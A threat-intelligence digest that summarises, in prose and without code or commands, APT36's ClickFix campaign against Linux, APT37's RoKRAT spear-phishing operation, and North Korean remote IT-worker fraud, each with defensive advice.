Update: APT36 Adapts ClickFix Attacks to Target Linux Systems in New Campaign
ClickFix, a social engineering tactic we’ve previously covered in trending topics, has now been observed in a new campaign by APT36 (Transparent Tribe), a threat group linked to Pakistan. Traditionally used to target Windows systems through fake application errors or verification prompts, ClickFix tricks users into pasting and executing malicious console commands. This recent campaign expands the attack surface by targeting both Windows and Linux platforms, marking one of the first known uses of ClickFix against Linux users. Victims are lured through a fake Indian Ministry of Defence website, which profiles the operating system and serves platform-specific instructions. Windows users are prompted to run a malicious MSHTA command that deploys a .NET-based loader while displaying a decoy document. The campaign uses a CAPTCHA page for Linux users to convince targets to execute a shell command using the ALT+F2 run dialog. The command fetches a benign JPEG image, suggesting APT36 may be testing the infection chain before deploying actual malware. No persistence or outbound activity has been observed, but the delivery method is sound and could easily be weaponized with a simple payload swap. This evolution of ClickFix shows how adaptable and persistent this tactic has become, and it has now proven effective across all major desktop operating systems. It’s another reminder that users should avoid executing copied commands unless they fully understand their purpose. Security teams should remain alert to these low-tech, high-trust attacks that continue slipping through traditional controls.
APT37 Launches “Operation: ToyBox Story” Targeting North Korea-Focused Activists with Fileless Malware
In March 2025, North Korea-linked threat group APT37 launched a targeted spear phishing campaign against activists and analysts focused on North Korean issues. The operation, dubbed “ToyBox Story” by Genians Security Center, involved highly tailored phishing emails masquerading as invitations from a South Korean national security think tank. These emails included references to current geopolitical topics, like “Trump 2.0 Era” and “North Korean Troops Deployed to Russia,” to increase credibility. Embedded Dropbox links led recipients to compressed archives containing shortcut (LNK) files that executed PowerShell-based, fileless malware without dropping traditional executable payloads. This tactic, aligned with the “Living off Trusted Sites” (LoTS) model, abuses legitimate cloud services for command and control, making malicious activity difficult to detect in enterprise environments. The infection process uses PowerShell to stage multiple components in memory, including the RoKRAT malware, a tool previously used by APT37 that has been subtly updated to avoid detection. The script evades pattern-based antivirus detection by manipulating file extensions and executing payloads in memory, leaving little forensic evidence. RoKRAT collects screenshots and system info and exfiltrates data using Dropbox APIs authenticated with stolen OAuth tokens tied to Russian Yandex accounts. Communications are obfuscated with XOR and AES-CBC-128 encryption, showing a high degree of operational security. Security teams are advised to implement behavior-based detection and EDR anomaly hunting, as traditional tools will likely miss this level of stealth. The campaign reinforces concerns about APT37’s ongoing intelligence-gathering efforts and their effective use of cloud infrastructure to blend malicious activity into legitimate workflows.
Update: DPRK Remote Work Fraud Evolves, Indictments Reveal New Tactics and Global Infrastructure
We’ve previously reported on North Korea’s use of remote work fraud to infiltrate U.S. organizations, but recent indictments of 14 DPRK nationals show a significant escalation in both scale and sophistication. Over the past six years, this operation has funneled at least $88 million into the DPRK by embedding operatives into U.S. companies and nonprofits using stolen identities. Flashpoint’s new investigation reveals how fake companies, information-stealing malware, and remote access tools like AnyDesk were used to apply for and maintain access to IT roles across the tech, finance, and crypto sectors. Fake domains such as Baby Box Info, Helix US, and Cubix Tech US were tied to fabricated resumes and fraudulent references, while saved HR platform credentials and browser autofill data pointed to compromised hosts in locations like Pakistan. This campaign goes beyond traditional fraud, using elaborate setups like “laptop farms” in Nigeria and Dubai, where DPRK actors remotely access company-issued hardware. Tactics included spoofed employment verification emails, manipulation of voice recordings to avoid video interviews, and instructions for smuggling devices through customs. Flashpoint uncovered translation activity between English and Korean, suggesting real-time coordination between Korean handlers and foreign collaborators. While many indicators pointed to Pakistan and other regions, Korean language settings, Chinese time zones, and use of Astrill VPNs with U.S. IPs are all signatures associated with North Korean threat activity. This evolution demonstrates a more distributed, proxy-based approach, raising the bar for detection. Organizations are urged to implement stronger identity verification, monitor for unauthorized remote access tools, and conduct deeper background checks to avoid becoming the next target in this expanding threat landscape.
